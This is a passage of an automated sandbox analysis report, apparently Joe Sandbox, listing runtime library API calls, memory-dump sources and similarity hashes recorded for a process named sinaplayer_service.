                                                                                                                                                                                                    • 4z[lLz[l`z[lSchedulerKind, xrefs: 6C5A3445
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Policy$Concurrency@@ElementKey@2@@Policy@SchedulerThreadValue@$CurrentExceptionPriorityThrowstd::exception::exception
                                                                                                                                                                                                    • String ID: 4z[lLz[l`z[lSchedulerKind
                                                                                                                                                                                                    • API String ID: 4031781369-2280248837
                                                                                                                                                                                                    • Opcode ID: 2089f4ed8c228c067fce8177f6ae6d63e77ddc1b6012ad24368a17313d2bf7bb
                                                                                                                                                                                                    • Instruction ID: 2e173e57aa73c4225859f890c71568386e6c9cd59bd2f3296f8118f42808d96e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2089f4ed8c228c067fce8177f6ae6d63e77ddc1b6012ad24368a17313d2bf7bb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AF0F671A01219EBDF10DFB58D49AEE7BBCBB11244F000955ED15A3A40EB74D905CBB8
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?setg@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXPA_W00@Z.MSVCP120(8285FFAB,8285FFAB,?), ref: 0038E00F
                                                                                                                                                                                                    • fgetwc.MSVCR120 ref: 0038E01E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 0038E138
                                                                                                                                                                                                    • ungetc.MSVCR120 ref: 0038E18A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@?setg@?$basic_streambuf@_U?$char_traits@_W00@W@std@@@std@@fgetwcungetc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 26466257-0
                                                                                                                                                                                                    • Opcode ID: b5539aadfe12b0ea11544e0a1ad65e03422d28a259daf43273e6db019f1b1e9d
                                                                                                                                                                                                    • Instruction ID: 3c142944f5ad729f4071734170b8146ae50e1564513c822de2e5ec0383034011
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5539aadfe12b0ea11544e0a1ad65e03422d28a259daf43273e6db019f1b1e9d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36619071A0021ADFDF26DFA8C845AEEB7B8FF08314F540566E902B7680D731E954CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR120 ref: 6C5C4DEA
                                                                                                                                                                                                    • List.LIBCMT ref: 6C5C4E52
                                                                                                                                                                                                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 6C5C4E69
                                                                                                                                                                                                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 6C5C4E7C
                                                                                                                                                                                                    • List.LIBCMT ref: 6C5C4EC8
                                                                                                                                                                                                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 6C5C4EDF
                                                                                                                                                                                                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 6C5C4EF2
                                                                                                                                                                                                    • List.LIBCMT ref: 6C5C4F3B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::FindGroupRing::ScheduleSchedulingSegment$List$AcquireConcurrency@@Lock@details@ReaderWrite@_Writer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 230955726-0
                                                                                                                                                                                                    • Opcode ID: 266e769967685039b14a5621c483210179a375d5f116787b4f7c2708b98a48a2
                                                                                                                                                                                                    • Instruction ID: 0d1cd9693a8d2c7c02eeb79097ce74a734f5f509dbe2261c1df4cdfe93521f97
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 266e769967685039b14a5621c483210179a375d5f116787b4f7c2708b98a48a2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4515D75B04209EFDB08CB95CC94FEAB7B8FF45318F05856DE51AA7A40C734AA04CB92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Reset@CallbackBase@internal@base@@QAEXXZ.BASE(8285FFAB), ref: 00386F64
                                                                                                                                                                                                    • ?Release@RefCountedThreadSafeBase@subtle@base@@IBE_NXZ.BASE(?,?,?,?,?,?,?,?,?,?,?,?,?,0039AF90,000000FF), ref: 00386F7D
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@QAE@ABV012@@Z.BASE(?,8285FFAB), ref: 00387002
                                                                                                                                                                                                    • ?Reset@CallbackBase@internal@base@@QAEXXZ.BASE ref: 00387011
                                                                                                                                                                                                    • ?AddRef@RefCountedThreadSafeBase@subtle@base@@IBEXXZ.BASE ref: 00387024
                                                                                                                                                                                                    • ?Release@RefCountedThreadSafeBase@subtle@base@@IBE_NXZ.BASE(?,?,?,?,?,?,?,?,?,?,?,?,?,0039AF90,000000FF), ref: 00387041
                                                                                                                                                                                                    • ?Release@RefCountedThreadSafeBase@subtle@base@@IBE_NXZ.BASE ref: 00387076
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE ref: 0038709B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@Base@subtle@base@@CallbackCountedSafeThread$Release@$Reset@$Ref@V012@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1412264623-0
                                                                                                                                                                                                    • Opcode ID: 58332cdfcea1b27e5f1f510533f452556dde40085c75805f5a32810544487adf
                                                                                                                                                                                                    • Instruction ID: fef5b6fe62f8b0c71d3e60daf20c48d2a95b4d2088e02ae36cd963c2399b3c2b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58332cdfcea1b27e5f1f510533f452556dde40085c75805f5a32810544487adf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9851ECB1A04705DFDB12EF54D905BAEB7A8FF04710F55029AEC16AB780DB71EA10CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00390CB0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 00390CF2
                                                                                                                                                                                                      • Part of subcall function 00390CB0: ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP120(?,00000000,00000000,8285FFAB), ref: 00390D10
                                                                                                                                                                                                      • Part of subcall function 00390CB0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00390D3A
                                                                                                                                                                                                      • Part of subcall function 00390CB0: ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP120 ref: 00390D54
                                                                                                                                                                                                    • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000002,00000000,00000000,00000021,00000040,00000001,8285FFAB,?,?,00391DBA), ref: 003917A5
                                                                                                                                                                                                    • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP120(00000000,00000000,00000000,00000021,00000040,00000001,8285FFAB,?,?,00391DBA), ref: 003917B1
                                                                                                                                                                                                    • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@_JH@Z.MSVCP120(00000000,00000000,00000002), ref: 003917CD
                                                                                                                                                                                                    • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP120(?), ref: 003917E0
                                                                                                                                                                                                    • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@_JH@Z.MSVCP120(00000000,00000000,00000000,?), ref: 00391818
                                                                                                                                                                                                    • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PAD_J@Z.MSVCP120(00000000,?,?), ref: 00391828
                                                                                                                                                                                                    • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000002,00000000), ref: 00391852
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 00391863
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$U?$char_traits@_W@std@@@std@@$?seekg@?$basic_istream@?setstate@?$basic_ios@_V12@_$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@??1?$basic_ios@_?clear@?$basic_ios@?read@?$basic_istream@?tellg@?$basic_istream@D@std@@@1@_H@2@Init@?$basic_streambuf@_V12@V?$basic_streambuf@V?$fpos@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3756623340-0
                                                                                                                                                                                                    • Opcode ID: 83293fce6b494b70d43a974797582b980c15e13099c1712a279aa6f431357055
                                                                                                                                                                                                    • Instruction ID: 23e5f78046de20f293882bc1c486f579432ec7319e1055204fb6c55bf8a2b200
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83293fce6b494b70d43a974797582b980c15e13099c1712a279aa6f431357055
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0441C231640205AFDF26DB54CE9AFDAB7B8FB14700F0141A5E60AAB2E0DB31AE04CF50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?), ref: 6C564C90
                                                                                                                                                                                                    • _read.MSVCR120(00000000,?,?), ref: 6C564C97
                                                                                                                                                                                                    • _fileno.MSVCR120(?), ref: 6C564CBA
                                                                                                                                                                                                    • _fileno.MSVCR120(?), ref: 6C564CCA
                                                                                                                                                                                                    • _fileno.MSVCR120(?), ref: 6C564CDB
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?), ref: 6C564CE6
                                                                                                                                                                                                      • Part of subcall function 6C5658BC: _malloc_crt.MSVCR120(00001000,0]Zl,?,6C5813DD,0]Zl,00000000,00000000,00000000,?,6C5A5D30,00000000,?), ref: 6C5658C6
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5A4FFE
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5A5009
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fileno$_errno_invalid_parameter_noinfo_malloc_crt_read
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1828220225-0
                                                                                                                                                                                                    • Opcode ID: 1ba9a146fafe0e01d801a800db7c2c153c677be46f3be4f832c9ec57e8c33b3b
                                                                                                                                                                                                    • Instruction ID: 954996937a547e3c755cfea19a99d953d3141b202568ac2f9182f83a2bfdbc96
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ba9a146fafe0e01d801a800db7c2c153c677be46f3be4f832c9ec57e8c33b3b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6231F531444606AAD710CA7BCC5076AB7B0BF4273CF248709D47486EF1D738E4568BD1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000001,00000000,00000001,00000002,?,00000000,?), ref: 6C582F3A
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(?,00000000), ref: 6C582F40
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 6C582F47
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 6C582F4A
                                                                                                                                                                                                      • Part of subcall function 6C564DF1: _get_osfhandle.MSVCR120(?,?,?,?,6C564F10,?,6C564F30,00000010), ref: 6C564DFA
                                                                                                                                                                                                      • Part of subcall function 6C564DF1: _get_osfhandle.MSVCR120(?), ref: 6C564E1D
                                                                                                                                                                                                      • Part of subcall function 6C564DF1: CloseHandle.KERNEL32(00000000), ref: 6C564E24
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6C5AF075
                                                                                                                                                                                                    • __doserrno.MSVCR120(?), ref: 6C5AF080
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _get_osfhandle$CurrentHandleProcess$CloseDuplicate__doserrno_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4219055303-0
                                                                                                                                                                                                    • Opcode ID: 9424b3a5bad874a063449f07bdb6f6a421dd40d73fb8d381f8dbbad5c4ed30b6
                                                                                                                                                                                                    • Instruction ID: 4eb2e9b558ffd6fce798dbd6404fdd5ce23cc3996dfef361782172a18aa4a497
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9424b3a5bad874a063449f07bdb6f6a421dd40d73fb8d381f8dbbad5c4ed30b6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A331F831A05260BFCB209F7ADCD4A9A7FF4EF06318F254699E4588FAA2C770D801CB55
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,6C570D40,0000000C), ref: 6C570C95
                                                                                                                                                                                                      • Part of subcall function 6C564B96: _lock.MSVCR120(?), ref: 6C564BC1
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?,6C570D40,0000000C), ref: 6C570CA5
                                                                                                                                                                                                    • __output_l.LIBCMT ref: 6C570D16
                                                                                                                                                                                                    • __ftbuf.LIBCMT ref: 6C570D22
                                                                                                                                                                                                    • _errno.MSVCR120(6C570D40,0000000C), ref: 6C5A5539
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6C570D40,0000000C), ref: 6C5A5544
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,?,?,6C570D40,0000000C), ref: 6C5A5551
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,?,?,6C570D40,0000000C), ref: 6C5A555C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$__ftbuf__output_l_fileno_lock_lock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3923144078-0
                                                                                                                                                                                                    • Opcode ID: b587616c3fdde18e1d9a64b153342a7c6ffadd84a54d8ce7377ea34359b516b2
                                                                                                                                                                                                    • Instruction ID: 1d56d4064d32acd94606253d4ae3bb0ac863f7e22888eabf9692e75c8c2378d4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b587616c3fdde18e1d9a64b153342a7c6ffadd84a54d8ce7377ea34359b516b2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35212B71500645DBD7109FBA8C80A6F75E5AFD133CB64832AE4348AEE0DB39C9458B21
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120(8285FFAB,?,00000000,?,00000000,00398E48,000000FF,?,0037198F,?), ref: 00372346
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120(?,0037198F,?), ref: 00372359
                                                                                                                                                                                                    • ?good@ios_base@std@@QBE_NXZ.MSVCP120(?,0037198F,?), ref: 00372374
                                                                                                                                                                                                    • ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_ostream@DU?$char_traits@D@std@@@2@XZ.MSVCP120(?,0037198F,?), ref: 00372385
                                                                                                                                                                                                    • ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_ostream@DU?$char_traits@D@std@@@2@XZ.MSVCP120(?,0037198F,?), ref: 00372396
                                                                                                                                                                                                    • ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_ostream@DU?$char_traits@D@std@@@2@XZ.MSVCP120(?,0037198F,?), ref: 003723A7
                                                                                                                                                                                                    • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP120(?,0037198F,?), ref: 003723AF
                                                                                                                                                                                                    • ?good@ios_base@std@@QBE_NXZ.MSVCP120(?,0037198F,?), ref: 003723BC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$D@std@@@2@$?tie@?$basic_ios@V?$basic_ostream@$?good@ios_base@std@@?rdbuf@?$basic_ios@V?$basic_streambuf@$?flush@?$basic_ostream@V12@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2615938766-0
                                                                                                                                                                                                    • Opcode ID: d464c8f735ff0aa39ffafdc54ec096b0bf7216c1afb6773155114c4782f1c227
                                                                                                                                                                                                    • Instruction ID: bfd9891b934b889b873ca4fe56db87d25745fad625627ddd7c4b57ee548ef9a8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d464c8f735ff0aa39ffafdc54ec096b0bf7216c1afb6773155114c4782f1c227
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF2116383041008FC716CF18D958B2AFBE9FF98710B19855AE486C7361CB39E900CF84
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::GetHistory.LIBCMT ref: 6C5BEC4E
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::GetHistory.LIBCMT ref: 6C5BEC59
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Mean.LIBCMT ref: 6C5BEC62
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Mean.LIBCMT ref: 6C5BEC6C
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Variance.LIBCMT ref: 6C5BECC1
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Variance.LIBCMT ref: 6C5BECCC
                                                                                                                                                                                                    • _CIsqrt.MSVCR120(?,?,?,?), ref: 6C5BECD7
                                                                                                                                                                                                    • _CIexp.MSVCR120(?,?,?,?), ref: 6C5BECE3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Climbing::Concurrency::details::Hill$History::Measured$HistoryMeanVariance$IexpIsqrt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3578402837-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,000000FF,?,00000002,?,?,?,?,6C5F88BC,?,?,?,?,?,?,?), ref: 6C5F894A
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,000000FF,?,?,?,?,?,?,6C5F88BC,?,?,?,?,?,?,?), ref: 6C5F89B7
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,000000FF,?,00000000,?,?,?,?,6C5F88BC,?,?,?,?,?,?,?), ref: 6C5F89F1
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,000000FF,00000000,?,?,?,?,?,6C5F88BC,?,?,?,?,?,?,?), ref: 6C5F8A11
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,000000FF,?,?,?,?,?,?,6C5F88BC,?,?,?,?,?,?,?), ref: 6C5F8A30
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,6C5F88BC,?,?,?,?,?,?,?,?,?), ref: 6C5F8A8F
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,6C5F88BC,?,?,?,?,?,?,?,?,?), ref: 6C5F8A9D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wcsncpy_s$_errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4201559322-0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
